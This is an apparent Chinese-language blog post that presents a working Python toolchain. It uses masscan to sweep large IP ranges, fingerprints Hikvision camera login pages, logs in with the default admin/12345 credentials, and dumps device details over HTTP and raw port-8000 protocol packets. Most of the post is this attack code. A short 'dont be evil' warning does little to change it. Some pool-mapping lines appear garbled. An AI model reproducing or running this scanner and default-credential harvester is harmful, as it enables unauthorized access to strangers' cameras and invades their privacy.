Python Spider: 海康威视摄像头发现
挖坟= =and 最后一个爬虫。
缘起在去年,一个去某阿里的我并不认识的毕业师兄,这个毕业的师兄好像还写了北邮人ip到地址插件,这个师兄在毕业的时候发了一些列摆一摆贵邮的各种安全问题,其中有个摄像头默认用户名密码。结果呢,我就没登录进去那几个摄像头= =
警告:你所做的一切都是有迹可寻的,dont be evil。
大概这么几步: 1. 用高效的扫描器扫描大范围地址段,得到开放端口80的ip列表,最好还是随机而不是顺序排列的
- 对地址大海中聊若晨星般的ip进行http请求,获取服务器信息,保存下来。 3.
- 批量获取弱密码摄像头
首先,我们需要在unix下工作。。。我们需要辅助工具。我这里说下为什么会使用masscan,因为他比我自己写的扫描器比zmap、nmap更快,快很多,虽然它们各有所长。python这里又做起了胶水语言的勾当= =
#! /usr/bin python # -*- coding: utf-8 -*- """ 扫描指定端口 usage: python net interface port """ import sys import popen2 import os try: os.makedirs('data/open_port/') except: pass try: os.mkdir('dump') except: pass # 扫描网段内80端口, 生成列表 cmd = "sudo masscan -i" + sys.argv[2] + \ " -p " + sys.argv[3] + " --rate 100000 --wait 2 -oL data/open_port/open" + \ sys.argv[3] + "_ip.temp " + \ sys.argv[1] + " &&\ cut -f4 -d' ' data/open_port/open" + sys.argv[3] + \ "_ip.temp > data/open_port/open" + sys.argv[3] + "_ip.list &&\ rm -f data/open_port/open" + sys.argv[3] + "_ip.temp" print cmd # cmd = "sudo zmap -i " + sys.argv[2] + \ # " -p " + sys.argv[3] + " -o open" + sys.argv[3] + \ # "_ip.list " + sys.argv[1] (child_stdout, child_stdin) = popen2.popen2(cmd, bufsize=-1, mode='t') # 打印输出 sys.stdout.write(
是不是看上去特别奇葩,我把这种奇(zuo)葩(si)的行事方式叫做quick and dirty式,除了确实能用没有其它优点了(ゝ∀・)
速度很快,这已经到我无线上行的顶峰了,旁边打游戏的同学不要打我ლ(╹◡╹ლ)。喝杯水,看会有爱的eloquent javascript,设定下终端静默时提醒,嗯,好像终端提醒这种神器只有yakuake会有~\^\_\^~
#! /usr/bin python # -*- coding: utf-8 -*- """ 获取server dict """ import socket from gevent import monkey monkey.patch_all() # 设置默认timeout时间 timeout = 20 socket.setdefaulttimeout(timeout) import requests import pickle with open('./data/open_port/open80_ip.list') as f: ips = f.readlines() ips = [ip.strip() for ip in ips] # 移除开头和结尾的无关信息 try: ips.remove('#masscan') # ips.remove('# end') except: ips.remove('saddr') finally: ips.remove('') # 保存80端口响应 server_dict = {} def check_service(ip): s = requests.session() print "test", ip try: r = s.get('http://' + ip, verify=False, allow_redirects=True, timeout=20) server_dict[ip] = r except: pass from gevent.pool import Pool pool = Pool(30) pool.join(timeout=20), ips) print '-' * 40 print "Dumping port-80 response..." with open('./data/dict/server_dict.txt', 'wb') as f: pickle.dump(server_dict, f)
总之,你阻塞的每次请求变成了可以并发的请求。这里的坑我不想说,因为我不懂= =,但你可以自己试试不用gevent的版本。
我觉得这东西就是其特点了´ ▽ ` )ノ
这种默认用户名密码上网一搜就搜到了= =
#! /usr/bin python # -*- coding: utf-8 -*- """ 获取摄像头信息框架 输入: - 特征字符串 - 获取信息方法。同步/异步 输出: 编号文件camera_num id:name:username:password """ import socket from gevent import monkey monkey.patch_all() # 设置默认timeout时间 timeout = 100 socket.setdefaulttimeout(timeout) import requests import pickle with open('./data/dict/server_dict.txt') as f: server_dict = pickle.load(f) # Hikvision: 可登录验证 # # 第一种 print "Hikvision IP Camera found:" print "Username: admin" print "Password: 12345" t_1 = {} print "-" * 40 for x in server_dict.iteritems(): if x[1].content.find('doc/page/login.asp') >= 0: print x[0] t_1[x[0]] = '' # 抓取第一种设备信息 def device_info(ip): s = requests.session() s.auth = ('admin', '12345') try: r = s.get('http://' + ip + '/PSIA/System/deviceInfo') if r.ok: t_1[ip] = r.content else: r = s.get('http://' + ip + '/ISAPI/System/deviceInfo') if r.ok: t_1[ip] = r.content except: t_1[ip] = '' pass from gevent.pool import Pool pool = Pool(300) pool.join(timeout=100), [ip for ip in t_1.keys()]) print "[*] Dumping type 1 devices info" with open('./dump/camera/t_1.txt', 'wb') as f: pickle.dump(t_1, f)
#! /usr/bin python # -*- coding: utf-8 -*- """ t_2 OCX """ # FIXME: 经常失败? # 目前想法是控制timeout # 多次请求后成功率变高? import socket # 设置默认timeout时间 timeout = 2 socket.setdefaulttimeout(timeout) import pickle import struct with open('./data/dict/server_dict.txt') as f: server_dict = pickle.load(f) # 第二种 print '-' * 40 print "Find IP Camera Type 2" print "Hikvision IP Camera found:(ObjectX, check disabled)" print "Username: admin" print "Password: 12345" t_2 = {} for x in server_dict.iteritems(): if x[1].content.find('NetOCX') >= 0: t_2[x[0]] = '' print x[0] # 抓取第二种设备信息 def device_info(ip): print "test ", ip try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, 8000)) s.send("\x00\x00\x00TZ\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x04\x00(\xc1\x00\x00\x00\x00\x0f\x02\x00\n\x08\x00';Je\x00\x00tsXrcsXYs9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00bbXcsXctst\x00\x00\x00\x00\x00\x00") data = s.recv(1024) login_rt = "\x00\x00\x00L'\x00\x00\x00\x00\x00\x00'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" s.close() if data != login_rt: t_2[ip] = '' return else: # 首先是个seq # 可能无效包,但测试必须有后面才正常 for i in range(3): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, 8000)) seq_req = "\x00\x00\x00TZ\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x10\x04\x00(\xc1\x00\x00\x00\x00\x0f\x02\x00\n\x08\x00';Je\x00\x00z\xdaf\x00\x8d\x16\xd2~\x9dU\x05\xf1\x1fi\xbb\xa9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc3\xd0\xa2|\xa6v\xbd\xf3\x1eO\xd1\xcb\xdc\xae\xcbd" s.send(seq_req) seq_ret = s.recv(1024) del seq_ret s.close() # 然后是name_seq s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, 8000)) name_seq_req = "\x00\x00\x00 Z\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x0f\x02\x00\n\x00\x01\x00\x02\x08\x00';Je\x00\x00" s.send(name_seq_req) name_seq_ret = s.recv(1024) # print "name_seq_ret: ", name_seq_ret s.close() # 其次是chanel s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, 8000)) chanel_req = "\x00\x00\x00$Z\x00\x00\x00\x00\x00\x00\x00\x00\x02\x022\x0f\x02\x00\n\x00\x01\x00\x02\x08\x00';Je\x00\x00\x00\x00\x00\x01" s.send(chanel_req) chanel_ret = s.recv(1024) # print "Chanle_ret: ", chanel_ret # 再来解析mac地址 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, 8000)) mac_req = "\x00\x00\x00 Z\x00\x00\x00\x00\x00\x00\x00\x00\x02\x01\x00\x0f\x02\x00\n\x00\x01\x00\x02\x08\x00';Je\x00\x00" s.send(mac_req) mac_ret = s.recv(1024) s.close() t_2[ip] = {'chanel': chanel_ret[20:40].strip('\x00').decode('gbk'), 'server_name': name_seq_ret[20:40].strip('\x00'), 'seqnum': name_seq_ret[60:100].strip('\x00'), 'mac': "%02x:%02x:%02x:%02x:%02x:%02x:" % struct.unpack('BBBBBB', mac_ret[36:42])} except: t_2[ip] = '' pass for ip in t_2.keys(): device_info(ip) print "[*] Dumping type 2 devices info" with open('./dump/camera/t_2.txt', 'wb') as f: pickle.dump(t_2, f) for k, v in t_2.iteritems(): if v == '': print k, ': login failed' continue print k, ': Ok, info dumped.'
大概是知道创宇的zoomeye出来之前,我想在贵邮局域网实现shadon,一个设备杂项搜索引擎,最后,实验室太忙了= =只有个从未公开的ftp搜索web界面